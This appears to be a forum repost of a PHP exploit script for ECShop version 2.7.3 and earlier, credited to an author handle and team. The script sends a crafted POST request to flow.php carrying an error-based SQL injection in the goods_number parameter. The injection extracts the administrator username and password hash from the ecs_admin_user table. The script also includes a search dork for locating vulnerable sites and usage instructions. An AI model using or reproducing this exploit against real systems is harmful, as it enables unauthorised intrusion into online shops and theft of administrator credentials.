ECShop <= v2.7.3 SQL injection / exploit
好像是最新的
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.7.3 SQL injection / exploit
by 帅的一塌糊涂
mail: hiqiushuiabc gmail dot com
team: [url]http://hi.baidu.com/w5r2[/url]
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$str = send();
if ( $str){
preg_match('/ouou~(.*?)~1/', $str, $arr);
$result=explode("-",$arr[1]);
if($result[0]=="")
{
print_r("Exploit Failed! \n");
}
else
{
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
}
}
function send()
{
global $host, $path;
$cmd ='step=update_cart&goods_number[-111%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,user_name,0x2D,password,0x7E31)%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#]=2';
$data = "POST ".$path."flow.php HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
echo $resp;
}
?>
评论20次